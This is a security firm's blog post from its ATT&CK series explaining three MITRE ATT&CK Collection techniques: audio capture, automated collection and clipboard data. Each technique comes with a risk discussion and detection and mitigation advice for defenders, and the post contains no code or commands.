ATT&CK Series: Collection Tactics

While gaining and maintaining a foothold in a network are some of the first hurdles an attacker must overcome, what they are after is data – be it in the form of corporate intelligence, trade secrets, financial information, or client records. Attackers can then sell this data to the highest bidder, use it for personal gain, or simply use it as a way to embarrass or potentially blackmail an organization.

During our penetration testing engagements, to demonstrate potential impact on clients, members of Optiv’s Threat Management team typically seek out the same data an attacker would be seeking. “Getting Domain Admin” is not always (and should not be) the primary goal of a penetration test, as many times we can achieve the same demonstration of impact without that level of access.

In this post, we will address some of the MITRE ATT&CK’s Collection techniques and tactics, from an attacker’s point of view. The techniques covered here are just some of the methods that adversaries can harvest organizational data – is not a fully comprehensive list. Now that we have a better idea of what “collection” entails let’s dive into the first three techniques.

Techniques

T1123 - Audio Capture

Description
Thousands of conversations take place over the course of a typical workday, many confidential in nature. Often, executive members of an organization will opt not to communicate highly sensitive information over email or other written communication because it does not leave a paper trail, and instead will only discuss these topics verbally. Consider the valuable intelligence a competitor could gain by having a 24x7 listening device in the boardroom, a member of the legal team’s office, or even the CEO’s office.

Audio capture entails enlisting a compromised device to serve as a listening post in the victim organization. An attacker can use the device’s built-in microphone to eavesdrop on conversations in real-time or save the audio capture to a file and exfiltrate it at a later date.

What's the Risk?
As organizations put more and more IoT devices on the network, each becomes a potential vector of attack. If a device with a microphone is compromised, be it a smart speaker, desktop computer or IP phone, an attacker could potentially use that device to eavesdrop on whatever physical area that device is located. Given that many organizations have descriptive asset naming conventions such as BOARDROOM-PC or CEO-DESKTOP, we can see how these devices might be a high-value target for audio capture.

Detection and Mitigation
This technique can be challenging to defend against from purely a software or configuration perspective. Hardware solutions exist that will effectively render a device’s microphone useless by simulating an external microphone, only without the components that capture audio. Depending on the type of device, another option is to disable the microphone within the BIOS. Also be aware of other devices attached to the host, as users may have a secondary microphone attached to the system, such as one built into an external webcam, or a separate USB microphone.

T1119 - Automated Collection

Description
Recall that attackers are usually after data and that once an attacker has a foothold in the network along with some form of persistence, the next step is to find and exfiltrate data. Attackers can automate this process through various means such as batch files, shell scripts, or functionality built into their remote access toolset. Additionally, attackers can set these scripts to run under a repeating scheduled task.

In large networks, automated collection increases the speed at which an attacker can collect data from hundreds or thousands of machines. Attackers can narrow down their focus so that only files with a specific extension are collected and sent off to their command and control server. Automating the collection process also ensures that if any new data is added to a repository being monitored, it will be included in the next round of collection.

What's the Risk?
Automated collection allows an attacker to gather large quantities of data quickly and easily. Depending on the technique, these processes may slip under the radar of EDR solutions, since many of the actions taken involve regular day-to-day activities that a legitimate business user might undertake. Copying files to and from a network share, executing batch or bash scripts, and other data management processes are all tasks that a sysadmin performs daily, which can aid an attacker in blending in with normal network traffic.

Detection and Mitigation
Since many techniques of automated collection can be misconstrued as legitimate traffic, detection and mitigation can be difficult. Understanding your network’s baseline can be beneficial in helping spot anomalous activity. Since a typical office employee carries out many of the same functions daily, a deviation from their normal routine could be indicative of malicious activity. While it can be difficult in larger organizations, knowing and understanding your company’s job functions can help defenders to detect when an employee is doing something that isn’t within their daily norm.

For larger organizations, user and network behavioral analytic solutions can help uncover these deviations from the norm. Monitoring east-west network traffic (user to user or server to server) is just as important as monitoring north-south traffic (client to server) to detect unusual activity within the network. Network devices and operating systems can produce mountains of data surrounding user activity, and behavioral analytics technologies help capture that data, analyze it, and alert security staff to potential threats.

Identifying known applications on the network and implementing a software restriction policy can help prevent some automated collection techniques. By identifying which applications should be running in the environment, defenders can block applications that are not on the list of those allowed and receive alerts when something not on that list is executed.

Finally, file encryption and off-line storage of highly sensitive information can potentially thwart attackers from harvesting data. In the case of file encryption, even if an attacker gains access to the data, they will be unable to access it unless they can also obtain the decryption key. Off-line storage, while sometimes not practical, removes access to the data from the network, significantly decreasing the odds of unauthorized access.

T1115 - Clipboard Data

Description
An attacker can gain valuable information by monitoring a victim’s clipboard. Users frequently copy and paste sensitive information such as usernames and passwords between applications. Additionally, as more and more users adopt password managers, these applications must put data on the clipboard for it to be transferred to the application the user is attempting to access.

What's the Risk
Accessing clipboard data along with installing keyloggers (ATT&CK Technique T1056) gives an attacker a wealth of information about a user and organization. Anything from credentials to confidential financial data can be present in the user’s clipboard.

Detection and Mitigation
Since pasting to and retrieving data from the clipboard is a normal day-to-day process for most users, monitoring for unauthorized clipboard access can be difficult. Various memory analysis techniques can be used to see which applications are accessing the clipboard, but doing so in real-time is difficult and requires an extra effort to correlate user activity at the time of access.

Conclusion

The three collection tactics covered above are stealthy and effective ways for attackers to gain information about an organization. As we have seen, defending against any of these techniques is difficult, and it is critical for defenders to know their network baseline as thoroughly as possible to help spot suspicious activity. Knowing what applications and processes should be running on a standard workstation or server image will also help, as any deviation from those norms should be investigated.

As with most of the ATT&CK techniques, proper monitoring and thorough visibility into your networks and systems are both key in early detection. Microsoft provides a list of Windows Event Logs that should be monitored, at minimum, on their website at “Best Practices for Securing Active Directory” under Appendix L. Since the three techniques listed above can easily blend in with normal network traffic, identifying these techniques as actively in-use will most likely occur during a larger investigation. Microsoft also has a great article on monitoring Active Directory for signs of compromise that provides advice on monitoring your AD infrastructure as well as configuring a solid audit policy for event logging and alerting.

Keep in mind that despite having everything configured perfectly, all relevant logs being monitored, and the most advanced EDR solutions available, adversarial tactics are always changing. Staying up to date on the latest tools and techniques, and adapting your environment to react accordingly is critical to a successful defense.

Read more in Optiv’s ATT&CK series. Here's a review of related posts on this critical topic:

• ATT&CK Intro - September 2018
• ATT&CK Initial Access - October 2018
• ATT&CK Privilege Escalation - November 2018
• ATT&CK Discovery - March 2019
• ATT&CK Persistence - April 2019
• ATT&CK Credential Access - April 2019
• ATT&CK Execution - May 2019
• ATT&CK Defense Evasion - May 2019
• ATT&CK Lateral Movement Techniques - June 2019
• ATT&CK Exfiltration - July 2019
• ATT&CK Series: Command and Control - August, 2019
• ATT&CK Series: Collection Tactics – September, 2019
• ATT&CK Series: Collection Tactics Part Two – April, 2020
• ATT&CK Series: Impact – September, 2019